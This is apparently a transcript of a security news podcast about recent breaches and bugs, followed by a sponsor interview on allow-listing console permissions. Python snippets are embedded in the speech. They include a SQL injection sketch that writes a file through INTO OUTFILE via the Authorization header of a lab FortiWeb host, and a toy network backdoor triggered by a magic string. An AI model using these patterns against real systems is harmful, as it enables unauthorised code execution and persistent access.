It's all the times when that's not how you're authenticating and trying to get into that
state.
And I think we're going to see a lot more of this sort of thing for years to come.
Yeah.
I mean, in the end, if we make auth really robust, people are gonna still keep wanting to get in, and the rise of,
you know, the success of Scattered Spider in doing social engineering attacks on those edge bits, you know, on the
enrollment process, on the reset process, on the "my dog ate my YubiKey" process,
you know, those that have a human part, like, those continue to be the weak links, and people who can exploit those are the ones that are gonna, you know, continue doing the
hacking and continue getting the shells. Yeah, now Catalin also wrote this up, this
one up for us, which was in his newsletter. Oh lordy. So this is some
research from John Tuckner, and I've mentioned John on the show before. He
runs this little startup that he's got called Secure Annex, and they're the ones
that look into the security of Chrome extensions.
And I think it's great.
I really hope he does well with this.
As I said, I've mentioned it before.
I had a call with him a few weeks ago just really talking about what he was doing.
So what he found is a bunch of extensions had this code stuffed into them that allowed
a company to like proxy web scraping requests through browsers that had these extensions
installed into them, right?
So this company is like, we can do a hundred thousand like web scrapes in parallel.
And the way that they fulfill this is through these extensions, which, okay, is that illegal?
I mean, it's probably not illegal.
If there's like a EULA there that someone has clicked through, like I'm guessing it's probably not illegal,
but you probably wouldn't want it running in your browser, that extension, because it turns out it like,
you know, disables a lot of like security headers and whatever, like it's not good. Let's put it that way. It's like not, not a great thing.
But I just found this a really interesting story about the sort of things that happen
now that someone is actually in there in those, like, Chrome web stores,
actually looking at these things, picking them up and shaking them.
This is the sort of stuff that's falling out.
Yeah. I mean, this was being marketed to developers as a way to monetize their
extensions.
So, instead of selling ads or whatever else, you can, in this case, sell your users', quote,
"unused bandwidth", end quote.
So yeah, you'd install this SDK or you'd integrate this SDK into your extension.
And then, yeah, when the machine was kind of idle
or whatever else, then, yeah, we'd phone back centrally,
make requests on behalf of the people,
and then send the results back, which, you know,
I'm sure the end, as you said, I'm sure the end user,
you know, agreements or whatever said,
by the way, we'll use our third party advertiser's code
to mumble, mumble, mumble.
But people don't expect that to mean
we're gonna proxy out your connection. And in the case of a private network or
a corporate environment, or somewhere where your browser has access different
to the regular internet, right, there are some interesting, kind of, you know... If I
could, on a pen test gig, go buy access to some end user in an organization's
browser, I'm gonna go hit the internal SharePoint.
I'm going to shell lots of internal stuff.
And it'll be party time.
I want to scrape everything on 10 dot whatever, right?
Yes, yeah, exactly.
Go find me the password store or whatever.
Oh dear.
So probably not criminal, but definitely not good.
No, it's definitely not what you want.
And I think this is great marketing too for Secure Annex, because, like, you know,
people listening to this, CISOs, are thinking, God, what sort of controls do we have on our browser extensions?
Yeah, you need to be, you need to be looking at this.
And I think we're still early in terms of like understanding what the potential for
badness is with these extensions.
And I think the crooks are actually lagging on this and they're going to catch up and
we're going to start seeing all sorts of fun stuff happening in extension land.
All right, we've got to pick up the pace here because we've got a long run sheet this week.
We've got to get through it.
But let's look at this one from Joe Cox over at 404 Media.
There's this company called Farnsworth Intelligence, whose business model
appears to be selling InfoStealer logs to, like, law firms, debt collectors, and all sorts of companies.
There's no allegation that they're operating these InfoStealers,
but they're gaining access to InfoStealer logs and then selling that data, which seems like,
I mean, okay, is it illegal to sell a username and password of someone's account that was
obtained from an InfoStealer?
I mean, I don't know.
Maybe.
Probably.
Maybe not.
But using that password is definitely illegal.
So I, you know, like, I wouldn't, I'm not a judge,
I'm not a lawyer, but I'm just saying,
I wouldn't operate a business like this
because I would think in addition to it being unethical,
I would expect there are some legal issues here as well.
Yeah, this seems pretty sketchy.
Like the guy behind this,
I don't know that he necessarily thought this
particularly well through, but yeah,
taking data that's on the dark web or wherever else you can get it, and then packaging up and
reselling it.
Now, there is something to be said for buying access to this data in a professional context.
I know back at Insomnia, we would pay subscriptions for some services that provided us with data
breaches and data dumps and stuff in the style
of Have I Been Pwned, but in a way that would give us credentials, right? So it would give you
unfiltered access to some of this data. And they took care, like the service we were buying was
them taking care of collecting, indexing, sorting, de-duping, et cetera, providing a stable API,
so that we didn't have to spend a day searching shady, dark websites trying to find our targets,
passwords and things.
So it was useful in that sense, but it was always a little bit kind of like, how do we,
in those cases, we were buying that service from people we knew and trusted.
So there was a personal relationship that kind of established some of the bona fide,
so we weren't just supporting randoms doing it, but it is a shady business.
And I wouldn't.
These guys aren't selling it for like info sec purposes or like so you can notify the
person that their accounts been breached.
They're giving people passwords so they can use the passwords you would think.
Yes, exactly. Which is not great.
Yeah. But I mean, you know, you can imagine like a bunch of the people that they're
selling to, like, skip tracers, right, who are trying to find people who've skipped out on bail.
Like, Oh man, getting, getting their email account, like, man, that's just making it
easy. Right? So of course they're going to, they're going to use it.
If I'm a skip tracer and I've got an opportunity to log into my target's email
address, you know, I'm going to do that.
So I know where they are.
We've also got this one from Zack Whittaker over at TechCrunch, which I
initially thought, eh, because it's about,
you know, people using SS7 to track people's phone locations.
Although what makes this interesting is it's kind of exploiting, I guess, weaknesses in SS7 to do this, right?
Yeah, so this is the this is interesting as normally as you said, this is just by design
the issue here is that most telcos have dealt with this kind of tracing by putting filters,
you know, essentially, SS7 firewalls on the edge of their SS7 network that would say,
when I see an incoming request for a mobile device location,
check to see if the device we're asking about is one of ours.
So check the IMSI, you know, the subscriber identifier, and if it's one of ours, don't answer that,
drop the request so they can filter them
for stuff that is on network.
The people who were abusing a bug here, it was,
I guess you'd call it, a canonicalization flaw,
where there are ways to, multiple ways to encode
these messages, such that a naive filter which doesn't understand
all of the ways of encoding it can be bypassed.
And it uses, like, ASN.1 BER encoding,
which is like super complex for no good reason.
So yeah, the attackers were kind of malforming the IMSI
that they were asking about in such a way
that it was still valid when decoded at the end,
but not valid when decoded
by the SS7 firewall in the middle.
So pretty sweet, you know, kind of technical exploit being used to do surveillance like
this.
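Here's a toy Python illustration of that general canonicalization problem. This is not real MAP/TCAP encoding, just the fact that ASN.1 BER allows the same value to be written with a short-form or a redundant long-form length: a filter that string-matches the "usual" bytes waves the alternate form through, while the endpoint's proper decoder still recovers the same IMSI.

```python
# Toy illustration of a canonicalization bypass: BER allows the same value to
# be encoded with a short-form or a (redundant) long-form length, so a naive
# filter matching on the "usual" bytes misses the alternate encoding that a
# real decoder still accepts.

PROTECTED_IMSI = b"\x21\x43\x65\x87\x09"        # dummy digits for an on-network subscriber

def encode(value: bytes, long_form: bool = False) -> bytes:
    tag = b"\x04"                                # OCTET STRING
    if long_form:
        return tag + b"\x81" + bytes([len(value)]) + value   # long-form length
    return tag + bytes([len(value)]) + value                  # short-form length

def naive_firewall(msg: bytes) -> bool:
    """Blocks only the exact encoding it expects to see."""
    return encode(PROTECTED_IMSI) not in msg

def proper_decoder(msg: bytes) -> bytes:
    """Decodes either length form, like the real endpoint does."""
    assert msg[0] == 0x04
    if msg[1] & 0x80:                            # long-form length
        n = msg[1] & 0x7F
        length = int.from_bytes(msg[2:2 + n], "big")
        return msg[2 + n:2 + n + length]
    return msg[2:2 + msg[1]]

normal = encode(PROTECTED_IMSI)
sneaky = encode(PROTECTED_IMSI, long_form=True)

print(naive_firewall(normal))                    # False -> blocked
print(naive_firewall(sneaky))                    # True  -> sails through the filter
print(proper_decoder(sneaky) == PROTECTED_IMSI)  # True  -> endpoint still resolves the target
```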
Yeah, yeah.
We've got some news out of Ukraine.
The Ukrainians are claiming to have wiped a bunch of databases at Gazprom, which is obviously
a company that's very important to Russia.
It's their gas company.
So we've linked
through to that one. I mean how much damage has been done? Hard to know. You're
not really gonna get some great visibility there. Oh time to talk about
bugs and bugs and stuff. John Greig's written this one up for the Record, but
there is a zero-day exploit for crush FTP in the wild. I feel like I'm having
deja vu. Didn't we have another one of these a few weeks ago? I think maybe this is a variant of
a bug, like, I think someone reversed a patch and then figured something out, so,
this, I don't know the specifics of this one. They reversed the patch and found a
different 0day. Yeah, I think it's probably like a bypass in whatever
protection. So this was a bug in the web management interface, I think, so I don't
know the specifics, we haven't seen a PoC for it, but yeah, it's being exploited in the wild.
And if you happen to run, you know, any sort of FTP server on the internet,
you're probably already having a bad time.
So get to patching.
We've got an interesting one here because I'm expecting a lawsuit because I think
Cisco is about to sue Hewlett Packard Enterprise, HPE, because they've started
including hard-coded credentials in their devices as well.
And we know that that's something that Cisco loves to do.
They might have some patents around that.
Not entirely sure. We'll have to see what happens.
But yeah, there's some hard-coded credentials in the HPE Aruba Instant On access points.
So like, what are these, Wi-Fi access points?
Yeah, they're Wi-Fi access points, like small-to-medium enterprise kind of Wi-Fi access points.
I don't know what the credential is.
I'm assuming that it's gonna be like a real sick burn and it's actually, like,
username Cisco, password Cisco, because that would be hilarious by HPE, but I suspect it's probably not. No, that's, uh, that's right.
And what do we got here? We got a pre-auth... Oh man, more from watchTowr.
We need to, look, we need to send them a case of beer or something.
watchTowr just keep providing the goods. So we got a pre-auth
SQL injection to RCE in Fortinet FortiWeb. Again, get a proxy, get a reverse proxy
in front of that thing, is my opinion. But yeah, walk us through this one, Adam,
because you told me this one is proper comedy.
It is proper comedy. So this is a SQL injection in the auth header of this Fortinet FortiWeb
product. So that's bad enough, right? Like literally it's the authorization header and
you stick SQL injection into it and it runs queries in the database. So that's bad. What's even worse is that then MySQL,
the underlying database is running as root
and Watchtower Labs have written up
how to turn that onwards into CodeExec
using the classic select into outfile SQL injection
where you can have a query write its response
onto the local file system and they leverage that
with some Python
trickery to turn it into pre-auth remote root code exec in your Fortinet security appliance.
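For flavour, here's roughly what that injection pattern looks like on the wire: a minimal Python sketch against a hypothetical lab box. The endpoint path, payload, and output file below are illustrative placeholders rather than the published proof-of-concept; the only point is that the Authorization header lands in a query where MySQL, running as root, will happily write the result anywhere on disk via INTO OUTFILE.

```python
import ssl
from urllib.request import Request, urlopen

# Sketch of the injection pattern only: a crafted Authorization header reaches
# a SQL query unsanitized, and because MySQL runs as root on the appliance,
# SELECT ... INTO OUTFILE can drop attacker-controlled content onto the
# filesystem. Endpoint, payload and output path are placeholders for a lab
# setup, not the published PoC.

TARGET = "https://fortiweb.lab.example"              # hypothetical lab appliance
HEADER = (
    "Bearer ' UNION SELECT \"print('hello from sqli')\" "
    "INTO OUTFILE '/tmp/overlay.py' -- -"
)

ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE                      # lab box, self-signed cert

req = Request(TARGET + "/api/fabric/device/status",  # illustrative endpoint
              headers={"Authorization": HEADER})
with urlopen(req, context=ctx, timeout=10) as resp:
    print(resp.status)
```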
So, good job Fortinet, good job. Well done guys. And we've also got, and anyone could have seen,
Blind Freddy could have seen this one coming, as they say, but there was the Citrix NetScaler flaw we spoke about a few weeks ago, and I think my comment at the time was,
yeah that one's gonna get a run. And apparently it is getting a run according to CISA. So this
story here is from David Jones at Cybersecurity Dive and was published on July 11. I'm not seeing
the news document that we work from filling up with links to stories about like this
NetScaler bug turning into a cyberpocalypse, but I don't know, there's still time.
Yeah, and there's plenty of people out there who are getting owned, and I have seen, you know,
some of the social media has been, you know, keeping an eye on all the sort of people who
are getting shelled. But this bug in particular, and the CitrixBleed bug that came before it,
the real value in these is that they are also a 2FA bypass, because you're stealing session tokens for
live sessions post-auth.
So all the 2FA in the world ain't going to help you, and that's worth something.
Yeah, yeah, it sure is.
And we've got, someone's written a backdoor for SonicWall devices, which of course, you
know, everybody needs a backdoor for one of those for when you pop them through some really dumb bug in them.
And Google's Threat Intelligence Group has published some stuff on that.
Yeah
They did a write-up of it, and this one really warmed my heart, because whoever wrote this particular backdoor
kind of did it in a very classic, trad Unix way. It's like a user-mode
rootkit, which they trigger from inside the initrd,
which is the RAM disk that it uses during boot up.
So they backdoor a shared library in the init RAM disk.
And then the way that you trigger this backdoor is
the user mode rootkit hooks all of
the network read and write functions,
and looks for magic strings being sent across the network.
So then you literally show up talking to the web interface on a SonicWall and
you can just send it commands, like, anywhere in the network message, and it
will get sniffed off the wire, essentially, by this rootkit and then used to trigger
the backdoor function, which is, you know, it's not novel, but it's just,
it warmed my heart that kids still pick it up at school.
It's nice to see it in the real world instead of someone just theorizing about
it in a con talk, you know, it's nice to see people actually out there doing the
thing.
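The trigger pattern itself, watching every inbound buffer for a magic marker and treating whatever follows as an operator command, is simple enough to sketch. This is a toy Python illustration of that pattern only; the real implant, per Google's write-up, does it in C by backdooring a shared library in the initrd so the hooked network read/write functions see the appliance's ordinary web traffic.

```python
import socket

MAGIC = b"__wakeup__"   # hypothetical marker; the real implant uses its own magic strings

def handle_command(cmd: bytes) -> None:
    # Stand-in for whatever the backdoor does once triggered.
    print(f"[implant] operator said: {cmd.decode(errors='replace')}")

def serve(port: int = 8080) -> None:
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("0.0.0.0", port))
    srv.listen()
    while True:
        conn, _ = srv.accept()
        data = conn.recv(65536)
        # Ordinary requests pass through untouched; only a buffer containing
        # the marker triggers the hidden behaviour, so the trigger can ride
        # inside any otherwise legitimate-looking message to the service.
        if MAGIC in data:
            handle_command(data.split(MAGIC, 1)[1][:64])
        conn.sendall(b"HTTP/1.1 404 Not Found\r\nContent-Length: 0\r\n\r\n")
        conn.close()

if __name__ == "__main__":
    serve()
```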
Exactly, exactly.
So I don't know which, you know, which Chinese, you know, private sector
contractor wrote this, but I appreciate you.
I appreciate your work, sir.
I wonder if one day it's going to be like after the Vietnam War, you know,
how Americans went back to Vietnam to see the tunnels and to have a beer with the VC.
I wonder if that's going to be us one day.
We'll be over in Beijing, sitting down, having a beer with the MSS,
talking about their adventures in Sonic Walls.
This actually reminded me too about a talk you did years ago
about writing user mode rootkits for Unix systems
where yeah, the whole purpose of your talk was like,
they won't let you do root.
So you have to do everything in user space,
like here's how I do it.
And it was a very funny talk
and you had a grab bag of party tricks that you showed.
Yeah, that was my non root rootkits talk.
And yeah, that was good fun.
This is why I appreciate this kind of like Unix Tomfoolery.
No, I get it. And I can tell that you're like, ah, I should have thought of that one.
I mean, hey, we did this. We were doing this a long time ago in the Unix. Well,
it's just really nice that kids still do it. That's what I value.
Okay, good, good, good.
Somewhere in Hainan Island, somebody is doing the same thing. And I was, yeah, I'm with you, brother.
I'm with you.
Yeah, yeah.
Let's see.
Let's see, though.
I reckon one day, the cyber tours,
where you get to as an older gentleman or an older lady,
get to tour through the cyber complex in China
and meet with those people and talk about how they got you.
Now, the last thing we're going to talk about today,
it's a story, another one from 404 Media by Matthew Gault,
which is talking about how hackers can remotely trigger the brakes on American trains,
and the problem has been ignored for years. Let me guess, this is something that's going to involve,
if you have the software-defined radio, you can send the magic packet that makes it do the thing, right?
That is exactly what the story is. It turns out, yes, there are these things they put on the back of trains
that monitor it and can also remotely activate the brakes. A train is arbitrarily
long as you add more, you know, carriages and things, and more carts, trucks, what are
they called? What's the cars? Cars, more cars to the train. So, you know, they don't
necessarily want to have to string wires along so they have radios. Yay. And of course, these
systems were all designed when the idea that the general public
would have access to flexible radios
was not a threat model, was not a thing anyone cared about.
So yeah, much like so much of our industrialized world
that relies on like 1970s, 1980s radio tech,
if you've got a radio, you win a great many prizes.
And the American regulator or whatever for the railway
industry has said that they're going to fix this at some point, but it's like billions
of dollars worth of gear that needs to be replaced. And it's hard not to read a story
like this and go, you know, the fact that no one has been activating the brakes on these
things meant that the cost of fixing this and doing it right in the 80s with, you know,
processes that can't do crypto or whatever other mechanisms, you know, whatever controls
you would have put in place versus the risks, just not addressing this was probably actually
the right choice from a risk management point of view.
So yeah.
Well, and I think make train stop, bad; make train go, worse.
Like if this was a make-train-go packet, that's really bad. Make train stop, okay, inconvenient.
Make train go, kaboom.
I think that's the thing.
Yeah, that's it.
Yeah, it's always fun reading these kinds of stories, you know, because they are,
you know, you're
torn between is it junk hacking?
Is it real?
Is it risk management?
Is it business?
And the answer is, hey, it's a little bit of all of them.
Look, I remember seeing a talk from Balint Seeber years ago on SDR stuff in Canberra,
and it is pretty terrifying once you realize like the breadth of this problem, like it
ain't just trains.
Like there is so much stuff you can mess with with SDR, and it's kind of surprising that we haven't seen
drama with it so far. But I mean, I guess, you know, a lot of the Flipper Zero stuff would be that,
that's where you see the mischief, people popping the battery charge flap on Teslas with the Flipper.
Yeah. Yeah, exactly, right?
But you're not seeing really, really serious stuff. Anyway, we got to wrap it up there because we're over time. No
surprises there because it's our first show in three weeks. But Adam Boileau, great to be back
on deck. Great to chat to you, man. We're going to do it all again next week. Cheers.
We certainly will, Pat. I will see you then.
That was Adam Boileau with a check of the week's security news. It is time for this week's sponsor interview now and we're chatting with David Cottingham
who is a co-founder and the chief executive of Airlock Digital.
Airlock makes allow listing software that you can actually use at scale.
They have customers with like 100,000 endpoints plus
and it works. It actually works and it's manageable and it's completely unlike trying to do it with the other tools that they are rapidly replacing in enterprise environments. So yeah, I guess
Airlock is a relatively new company. I mean, it's under 10 years old and as part of like becoming a serious business enterprise company, they had to actually work on creating a multi-user, multi-role console for allow listing.
Which makes sense because you've got some, you've got different groups who need to do different things with allow listing.
Like as you'll hear, like it's the support people who might give someone an exception to run something one time that they really need to run.
And it's the application people who might need to adjust the allow list because they're
rolling out a new application and whatnot.
So you know, where they started was just to have the one big console and everyone can
log into it.
But then as you start getting those really big customers, you have to start thinking
more and more about like, well, how does this product have to work, right? For different people in an organization.
Now this sounds like it might actually be a dull conversation, but it's really not.
It's an interesting one.
I'm talking to Dave about, you know, bringing Airlock up, growing it up into a proper
enterprise product with like a multi-role console.
So here is Dave Cottingham talking all about that.
Enjoy.
So we actually recommend that you have the security people
looking at the security data, the people that
are deploying applications looking at the app data.
And even though some people might laugh at it a little bit,
the support team issuing exceptions,
because that creates the most logical sort of business
engagement approach to getting apps deployed,
getting exceptions out there, and ensuring business continuity effectively. So what we have to do inside
of the console is essentially for all of those sort of major, I guess, persona
roles, attach, you know, different privileges so you can access or invoke
different parts of the product depending on whatever your role set is. And also
then thinking about how different actions can be dangerous.
We spend a lot of time thinking about how we prevent someone unintentionally or
intentionally configuring something in a bad way, you know, depending on their access.
Yeah. So that's a whole other part of this conversation. We'll get to that bit a little
bit later on, which is, well, we're seeing now like,
you know, these Com kids, the advanced persistent teenagers, they're going, and
state actors as well, they'll go after things like EDR consoles, compromise an
identity, switch off EDR or like make it blind or something.
And then onwards from there out to the end point.
So I'm guessing you've had to put a bit of thought there.
Um, but like, what was that transition like?
I imagine for you, it was like, yes,
single console, single administrator.
And then like, how do you begin to transition from that
into these multiple roles and permissions?
Because that's like, even if you wanna add one different role,
it's almost like a product rewrite of that part
of the product to begin with, right?
Completely.
And also, you know, the way our product worked a while ago was you sort of had
this one-object-to-many relationship where, for example, you could have a list
of applications that you've trusted.
And it might be in multiple, you know, Windows servers and Windows
workstations, for example, and customers might want two
different teams to administer both of them. However, you have like one application list
that links to both. And so decoupling all of that was a huge amount of work in the product.
So the first thing that a lot of vendors will do is they will just prevent you viewing those types of objects, right? So they
will say, okay, well, this page won't render unless you actually pass this permissions check.
But obviously that's quite weak, right? So you sort of start from that visual part so people can't see
it. And then you work backwards to, you know, what we call the application controllers underneath those pages, which is, okay, the controller
needs to authorize the user and what actions it's requesting based on what permissions
it has. And then down below that, then there is the back end, which is about what information
am I actually processing and generating? And that needs to be user aware. So the first
thing was actually making sure that each component has visibility
of what user has taken a particular action
and actually flowing that all through
because when we designed it in the first place,
it was sort of like, oh, the system did this
because you'd build like a binary
and it would just get parameters to do work,
but it wouldn't be aware of like,
who's actually asking it to do said work.
So, it was a full approach of front end middleware controllers and backend, making it user aware
and then making it permissions aware on top of that.
And then unpicking all the implications about, well, hang on, this part is actually related
to this part if you want to, let's say, approve an application
and making sure that you can do enough, but not sort of too much to influence things that
you don't have access to.
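To make the layering concrete, here's a minimal Python sketch of the pattern Dave is describing: page-level gating backed by controller checks and a user-aware backend. All the role names and functions are invented for illustration and are not Airlock's actual code.

```python
# Minimal sketch of the layered checks described above: the page only renders
# if the role allows it, the controller re-checks the permission on every
# action, and the backend records which user asked for the work. All names
# here are invented for illustration, not Airlock's actual code.
from dataclasses import dataclass

ROLE_PERMISSIONS = {
    "security": {"view_events", "view_policies"},
    "app_team": {"view_policies", "edit_policies"},
    "support":  {"view_policies", "issue_exception"},
}

@dataclass
class User:
    name: str
    role: str

    def can(self, permission: str) -> bool:
        return permission in ROLE_PERMISSIONS.get(self.role, set())

def approve_application(user: User, app_hash: str) -> None:
    # Controller layer: authorize the specific action, not just page access.
    if not user.can("edit_policies"):
        raise PermissionError(f"{user.name} may not edit policies")
    # Backend layer: the work item carries the acting user, so the change is
    # attributable rather than appearing as "the system did this".
    write_policy_change(app_hash, actor=user.name)

def write_policy_change(app_hash: str, actor: str) -> None:
    print(f"policy updated: {app_hash} trusted (changed by {actor})")

if __name__ == "__main__":
    alice = User("alice", "app_team")
    approve_application(alice, "sha256:abc123")   # allowed
    # approve_application(User("bob", "support"), "sha256:abc123")  # would raise
```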
Yeah.
So I imagine like the early stage of this, when you start moving to like more of a multi-user
multi-role platform is like you fire up version one, you're like, great, everything's broken.
Pretty much.
Completely.
Yeah.
Or I log in and nothing renders.
And it's because there's one call which is down here, which is shared, and then you have
to work to split that out.
I mean, even like we're going through a UI, you know, rebuild in the next release of the product.
We're in QA at the moment.
And yeah, really, it is every call,
rechecking all of those things meticulously
in every single combination of user permission
to just make sure that we're really blocking and tackling.
And having, for lack of a better term, sort of an
implicit deny approach to authorization in everything you do in the product.
Yeah, so it's interesting what you said, right?
Because earlier you were talking about how users have sort of coalesced around these
sort of pretty clearly defined roles, right?
Like there's the applications person, there's the support person.
When you were talking about exceptions, too, for those who didn't follow, it's like if someone tries to execute something,
they can't, the product blocks it,
they can go to support and ask for like a one-time code
to be able to run it and whatever.
And that's what a lot of customers want.
So you talk about these predefined roles,
but then you're talking about, well,
all of these combinations and permutations of permissions.
So I imagine that would have been a decision for you,
which is like, do we have several pre-canned roles
with permission sets, or do we let the users go in there
and really mess with stuff?
And it sounds like you went that route,
but surely there's dragons there, right?
In terms of unexpected combinations of permissions,
unlocking potential for stuff to go wrong.
Like how do you even begin testing
all of those combinations and
permutations to make sure that they work? It's really leaning heavily on automation, as much as
you can, because you cannot possibly throw people power at this. Like we've got an automation rig that runs for
about 48 hours, builds up a product, runs through all of those different permutations and then
it will be
not only sort of like a test harness, but it's functional testing that I think is the
most important. So it's actually going in there, having a system if you're automating
it, click something, and make sure that it can find the next thing that it actually needs
to click on to run through that process. And if you...
And then you want to see something actually pop out
onto an endpoint, right?
Essentially, yeah.
And then make sure that what you're doing in the console,
then you've got to tie automation in with the endpoint
as well in order to functionally test that.
We've really led a lot with functional testing,
preferencing it over unit tests,
even though both are important,
just because ultimately that sort of tests from the user perspective all the way down
to the backend, what's generated and then back up to what pops out in the other end.
It's sort of like a proven approach through the whole stack.
So there's a huge amount of complexity there. One classic one was we have view roles and edit roles, but you can't edit without viewing.
And it's kind of this silly thing where it's like, well, hang on, you need both of these if you want to edit.
And it's just lessons like that where, unless you plan it out meticulously, you very easily end up backing yourself into a bit of tech debt that you need to engineer out of.
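A tiny sketch of that "edit implies view" lesson: normalising implied permissions in one place rather than hoping every role gets both grants. The names are invented for illustration.

```python
# A tiny sketch of the "edit implies view" lesson: expand implied permissions
# once, centrally, rather than expecting every admin to remember to grant
# both. Names are invented for illustration.
IMPLIED = {"edit_policies": {"view_policies"}}

def effective_permissions(granted: set[str]) -> set[str]:
    expanded = set(granted)
    for perm in granted:
        expanded |= IMPLIED.get(perm, set())
    return expanded

# effective_permissions({"edit_policies"}) -> {"edit_policies", "view_policies"}
```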
Well, I mean, this is why it's an interesting conversation, right?
Is because, you know, I've been interviewing you since you were a little itty bitty baby startup, and you're not anymore.
Right. And this is all part of that growing up experience.
Yeah, one was the REST API.
So, you know, obviously we've got a whole REST API, and we try and make the REST API match
the logged-in interactive functionality as much as possible.
But you don't want REST API keys floating around there.
So we suddenly realized, well, hang on.
If I get an API key, we had a role
for granting a REST API key.
But then once you had an API key,
you could sort of do anything.
And then it's like, well, hang on.
We now need to put permissions on the rest API.
So how do we best do that?
Then the easiest thing we did was we broke it down to like calling endpoints.
So it's like, you need to say which endpoints this key has access to.
And then it will either allow or deny access to an endpoint.
But then it's like, okay, well, if I, let's say,
have access to the policies endpoint,
but I only want this REST API key for this user to see these policies,
you know, it starts to come back into that functional scope as well,
where you need to flow it through not only REST API access,
but back up into the application.
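A rough Python sketch of the endpoint-scoped API key idea Dave describes, where each key carries an allow list of endpoints and the check runs before any handler does. The key format and endpoint names are made up, not Airlock's API.

```python
# Rough sketch of endpoint-scoped API keys as described: each key carries an
# allow-list of endpoints, and the check runs before any handler does.
# Illustrative only -- not Airlock's API or key format.
API_KEYS = {
    "key-abc123": {"/api/policies", "/api/applications"},   # hypothetical
}

def authorize_api_call(api_key: str, endpoint: str) -> bool:
    allowed = API_KEYS.get(api_key)
    return allowed is not None and endpoint in allowed

assert authorize_api_call("key-abc123", "/api/policies")
assert not authorize_api_call("key-abc123", "/api/agents")
```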
And I think throughout the journey,
we've sort of learned that constraints are good,
and there are dragons when you try and satisfy
every single use case that every customer wants.
Well, that's kind of what I was asking about precanned versus
ultimate flexibility.
So you landed somewhere in between, have you?
Yeah, we have.
So we've got the REST API access, you know, based on endpoint and the user roles interactively.
And now we're adding in, you know, a bit of object access on the REST API side,
just so we can more granularly sort of segment based on who needs to manage what.
So it has happened that a customer said, oh, we would like to be able to do X, Y,
Z. And you're like, how about no.
Yes. I want, I want a REST API key just for this server, you know, and at the end
of the day, it comes down to, well, create a separate policy for that.
And then, you know, there's a level of, you need to structure it in a certain way.
If you want the level of granularity that you're looking for, cause you know,
yeah, learn the product, do it our way.
It's better.
There are infinite edge cases.
And if you try and satisfy them all, you'll end up with this unwieldy
monster that you need to manage.
Yeah.
Well, it's how vendors fall, right?
Like it is actually, they just get overly complex and then someone comes along with the next simple thing and you know, away you go.
And exactly. Starts again from a clean slate. Yeah.
And given like a big premise of your product, right?
So I spoke to Alex and Chris, or Alex and Steve actually over at Sentinel One about, you know, what various threat actors would do when they tried to access Sentinel One consoles.
You know, and you can't just turn off EDR, right? Like if you've got access to that console, because that will raise alarms,
that will cause some, you know,
bells to go off and whatnot.
So there are some natural sort of defences there
that you can build in,
but I'm curious how you tackled it
as an allow listing company.
Like what is it that you do to prevent a disaster
when a threat actor turns up with valid
credentials into your admin console? So the first thing and you touched on it with EDR is visibility
for the customer. So the customer needs to be able to really easily see what configuration changes
have been made at any given time so that they can see, hang on, this thing was added at
this time and you're showing them whenever a change is made.
The interesting thing about our product is all the changes are driven by the users.
So you go in, you want to allow something, it's you that needs to choose that.
It's not supplied by us as a vendor.
It's like you define that trust. So really bringing
forward what's being changed when and hopefully why if the administrator wants to fill in that
detail, it will tip them off to, hey, these policies have actually changed. So, you know,
letting them know is critical. The second one is understanding, especially in a deny by default scenario, about what
dangerous sort of policy looks like.
So when you're talking about implicitly not trusting
anything, it's a dangerous tool, potentially,
because what you can do is you could say,
oh, I want to block these system files, for example.
So what we spend a lot of time on is
doing things like, let's boot a system,
let's understand what the critical items actually are to get this system up to a shell, get network access so it can get policies, and
putting detections in place so that if
a policy the endpoint gets is detected that doesn't have, you know, this sort of
minimum required trust to allow a system to functionally operate, then what it will do
is it will continue operating on the same policy that it had previously and then it
will report safe mode.
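A minimal sketch of that agent-side behaviour: if an incoming policy doesn't trust the bare minimum the box needs to boot and reach the server, keep enforcing the last known-good policy and flag safe mode. The baseline items below are placeholders, not Airlock's actual list.

```python
# Minimal sketch of the agent-side veto described above: if a new policy
# doesn't trust the bare minimum needed to boot and reach the server, keep
# running the last known-good policy and report safe mode. The item names
# are placeholders, not Airlock's actual baseline.
MINIMUM_TRUST = {"kernel32.dll", "ntdll.dll", "agent_service.exe"}  # hypothetical

def apply_policy(new_policy: set[str], current_policy: set[str]) -> tuple[set[str], bool]:
    """Return (policy_to_enforce, safe_mode)."""
    if not MINIMUM_TRUST.issubset(new_policy):
        # Don't blindly trust the server: the agent vetoes a policy that would
        # brick the box, keeps the old one, and reports safe mode instead.
        return current_policy, True
    return new_policy, False

if __name__ == "__main__":
    old = MINIMUM_TRUST | {"notepad.exe"}
    enforced, safe = apply_policy({"notepad.exe"}, old)
    print(enforced, safe)   # previous policy retained, safe mode reported
```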
I'm guessing this is your, your post-CrowdStrike disaster, uh,
initiative.
Oh, I look, I think, um, it,
it's been in there for a few years,
but we've definitely iterated on what that looks like.
Definitely tightened that one up a little bit after that. Yeah.
It was quite simple. And then, and then we sort of went, well, hang on,
what happens if this particular situation occurs?
And it's sort of like, you need to build in the smarts on the agent that you're influencing.
You can't have it blindly trust everything the server tells it to, even though the server is the authoritative...
Yeah, kind of do what I say, please.
You need to
also make sure that the agent itself has a level of veto in place to say, no, I'm not
doing that because that's bad.
And what about a malicious allow?
So you've talked about someone accessing a console and doing a malicious denial of like
a critical system DLL or something, right?
What about the opposite case where someone wants to get some malware or like some rat
onto an allow list? Like is there something you can build into the product that makes that
more difficult for a rogue admin to do? Because I'd imagine that would be very, very hard.
Yes, and I guess it's sort of like it's easy when there's known
malware that's out there, because we've got a great partnership with VirusTotal.
And we will basically flag like, hey, this malicious thing's been either added to your allow list or it's been detected as part of your trust set.
Like, if you've seen something that's bad, we'll alert you to that.
But when it's stuff that you haven't seen before, I think again, it's back to the best defence, which is visibility, seeing when an actual change has been made to add something and
giving people visibility of that.
Going forward, one thing that we're building is also segmented approvals of policy.
So what you'll have is two different users where one person sets up the policy changes
and another person has to go in and actually click accept on that.
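A small sketch of the segmented approval idea: one user stages a change, and a different user has to accept it before it applies. The class and names are invented, not Airlock's workflow.

```python
# Small sketch of the segmented approval ("two keys") idea: one user stages a
# policy change, and a *different* user must approve it before it takes
# effect. Invented names, not Airlock's workflow engine.
class PendingChange:
    def __init__(self, change_id: str, proposed_by: str):
        self.change_id = change_id
        self.proposed_by = proposed_by
        self.approved = False

    def approve(self, approver: str) -> None:
        if approver == self.proposed_by:
            raise PermissionError("proposer cannot approve their own change")
        self.approved = True

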